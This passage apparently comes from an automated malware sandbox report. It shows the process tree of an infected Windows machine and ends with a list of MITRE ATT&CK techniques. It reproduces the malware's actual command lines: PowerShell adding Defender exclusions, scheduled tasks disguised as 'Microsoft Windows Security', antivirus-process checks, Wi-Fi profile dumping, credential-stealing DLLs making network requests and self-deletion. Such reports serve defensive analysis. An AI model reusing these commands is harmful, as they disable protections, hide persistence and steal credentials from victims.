      4⤵
      PID:4304
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5384
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1640
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5640
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4148
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4972
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5680
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6036
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6124
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:768
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5708
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4016
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:132
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1080
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6108
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4936
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5328
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1708
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5316
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3672
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:348
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:404
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:688
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3708
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2468
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2996
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2648
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4872
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4016
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5184
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4664
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:704
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1140
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1900
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6048
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4400
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:796
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5368
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:340
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1976
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:4384
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3348
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:400
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5288
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6112
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:6060
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1072
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:1032
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5392
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5996
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3544
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5688
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:404
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3004
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:3852
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2668
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:5672
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      PID:2092
- - C:\Users\Admin\AppData\Local\Temp\Files\o.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:688
- - C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PCSupport.exe"
    3⤵
    - Executes dropped EXE
    PID:4464
  - - C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
      C:\Users\Admin\AppData\Local\PhantomSoft\Support\winvnc.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2980
- - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
    3⤵
    - Executes dropped EXE
    PID:2604
- - C:\Users\Admin\AppData\Local\Temp\Files\ZharkBOT.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ZharkBOT.exe"
    3⤵
    - Executes dropped EXE
    PID:3492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 448
      4⤵
      Program crash
      PID:3540
- - C:\Users\Admin\AppData\Local\Temp\Files\major.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\major.exe"
    3⤵
    - Executes dropped EXE
    PID:6052
- - C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:2084
- - C:\Users\Admin\AppData\Local\Temp\Files\ywx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ywx.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4284
  - - C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5664
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:436
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
        6⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:5936
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\Files\powershell.exe
        
        powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\973800497271_Desktop.zip' -CompressionLevel Optimal
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Executes dropped EXE
        
        PID:5632
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PowerShell" /tr "C:\Users\Admin\AppData\Roaming\PowerShell.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5300
    - - C:\Users\Admin\AppData\Local\Temp\Files\powershell.exe
        
        powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000070261\zx.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000070261\zx\'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Executes dropped EXE
        
        PID:4076
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        
        PID:3564
    - - C:\Users\Admin\AppData\Local\Temp\10000290101\osupdater.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000290101\osupdater.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:1696
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        
        PID:5676
      - C:\Windows\system32\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe"
        6⤵
        Adds Run key to start application
        
        PID:3300
      - C:\Windows\system32\audiodg.exe
        
        "C:\Windows\system32\audiodg.exe"
        6⤵
        Adds Run key to start application
        
        PID:5524
    - - C:\Users\Admin\AppData\Local\Temp\10000300101\nova.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000300101\nova.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:1864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k "taskkill /f /im "Gxtuum.exe" && timeout 1 && del "Gxtuum.exe" && ren c33e5d Gxtuum.exe && C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe && Exit"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4040
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im "Gxtuum.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:5300
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        6⤵
        Delays execution with timeout.exe
        
        PID:4796
      - C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
        
        C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:760
- - C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\30072024.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:5568
- - C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Channel1.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:5748
- - C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"
    3⤵
    PID:4996
- - C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"
    3⤵
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2876
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2032
- - C:\Users\Admin\AppData\Local\Temp\Files\PharmaciesDetection.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PharmaciesDetection.exe"
    3⤵
    - Drops file in Windows directory
    PID:1444
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
      4⤵
      PID:4888
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:2252
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1540
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:1440
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4524
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 447331
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5696
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "typesfaxincreasecompound" Ensemble
        5⤵
        
        PID:5388
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3040
    - - C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif
        
        Buyer.pif p
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:904
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif" & rd /s /q "C:\ProgramData\GDAECAECFCAA" & exit
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4600
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        7⤵
        Delays execution with timeout.exe
        
        PID:5932
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6052
- - C:\Users\Admin\AppData\Local\Temp\Files\FreeYoutubeDownloader.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\FreeYoutubeDownloader.exe"
    3⤵
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:5332
  - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
      "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
      4⤵
      PID:3728
- - C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"
    3⤵
    PID:5828
- - C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\23c2343.exe"
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\Files\osupdater.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\osupdater.exe"
    3⤵
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:4016
  - - C:\Windows\system32\audiodg.exe
      "C:\Windows\system32\audiodg.exe"
      4⤵
      PID:5160
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      PID:3872
  - - C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe"
      4⤵
      PID:5248
- - C:\Users\Admin\AppData\Local\Temp\Files\update.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:620
- - C:\Users\Admin\AppData\Local\Temp\Files\imgdisk.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\imgdisk.exe"
    3⤵
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    PID:3840
- - C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe"
    3⤵
    PID:6052
- - C:\Users\Admin\AppData\Local\Temp\Files\CFXBypass.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\CFXBypass.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1184
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:6044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:3516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2392
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:3452
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4496
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:5908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    PID:4316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6120
- C:\Users\Admin\AppData\Local\Temp\FC93.tmp.x.exe
  "C:\Users\Admin\AppData\Local\Temp\FC93.tmp.x.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5888
- C:\Users\Admin\AppData\Local\Temp\1433.tmp.zx.exe
  "C:\Users\Admin\AppData\Local\Temp\1433.tmp.zx.exe"
  2⤵
  - Executes dropped EXE
  PID:424
- - C:\Users\Admin\AppData\Local\Temp\1433.tmp.zx.exe
    "C:\Users\Admin\AppData\Local\Temp\1433.tmp.zx.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1640 -ip 1640
1⤵
PID:2544

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1336

C:\Users\Admin\AppData\Roaming\Eszop.exe
C:\Users\Admin\AppData\Roaming\Eszop.exe
1⤵
- Executes dropped EXE
PID:928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3492 -ip 3492
1⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:4224

C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:4968

C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
1⤵
PID:3560

C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\AppData\Roaming\PowerShell.exe
1⤵
PID:4528

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Loads dropped DLL
PID:5288

C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
1⤵
PID:132

C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\AppData\Roaming\PowerShell.exe
1⤵
PID:1072

C:\Users\Admin\AppData\Local\Temp\service123.exe
C:\Users\Admin\AppData\Local\Temp\/service123.exe
1⤵
- Loads dropped DLL
PID:5984

C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\87d87ee084\Gxtuum.exe
1⤵
PID:1272

C:\Users\Admin\AppData\Roaming\PowerShell.exe
C:\Users\Admin\AppData\Roaming\PowerShell.exe
1⤵
PID:4416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery